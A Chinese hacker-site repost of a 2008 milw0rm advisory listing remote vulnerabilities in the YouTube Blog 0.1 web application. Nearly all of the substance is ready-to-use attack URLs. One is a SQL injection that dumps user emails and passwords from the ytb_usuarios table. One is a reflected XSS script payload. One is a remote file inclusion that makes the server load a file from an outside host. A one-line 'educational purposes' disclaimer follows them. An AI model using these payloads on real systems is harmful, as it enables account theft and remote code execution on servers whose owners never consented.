YouTube Blog 0.1 (RFI/SQL/XSS) Multiple Remote Vulnerabilities - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

免费服务	我要发布	在线破解	黑客游戏	精华收集	免费空间	网络硬盘	独家报道	黑器点播	免费 FTP	交换资源
收费服务	黑客培训	光盘刻录	黑客书籍	视频下载	主力频道	空间域名	网站建设	特色服务	解决方案	我要投诉

您现在的位置：华夏黑客同盟 >> 漏洞 >> web apps >> 正文

用户登录

新用户注册

YouTube 多个远程漏洞

荐 ★★★

【字体：小大】

YouTube Blog 0.1 (RFI/SQL/XSS) Multiple Remote Vulnerabilities

作者：milw0rm 文章来源：milw0rm 点击数：更新时间：2008-7-24

_____ _   _ _____ _____ _____ _____
/ ___| |_| | _ \| _ | _ |_   _|
| (___| _ | [_)_/| (_) | (_) | | |
\_____|_| |_|_| |_||_____|_____| |_|
        C. H. R. O. O. T. SECURITY GROUP
        - -- ----- --- -- -- ---- --- -- -
                     http://www.chroot.org

                          _   _ _ _____ ____ ____ __ _
        Hacks In Taiwan | |_| | |_   _| __|    | \| |
        Conference 2008 | _ | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                      http://www.hitcon.org

Title =======:: YouTube Blog 0.1 Multiple Remote Vulnerabilities

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: YouTube Blog

Download ====:: http://nchc.dl.sourceforge.net/sourceforge/youtubeblog/ytb_v0.1.zip

Mirror ======:: http://www.badongo.com/file/10507193

______________________

magic_quotes_gpc = Off
safe_mode = Off

_____
[SQL]

http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/*

_____
[XSS]

http://victim/ytb/mensaje.php?m=<script>alert(/xss/)</script>

_____
[RFI]

http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt

and more .. = =

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

# milw0rm.com

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇漏洞：远程盲SQL注入利用

下一篇漏洞：远程盲SQL注入利用

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913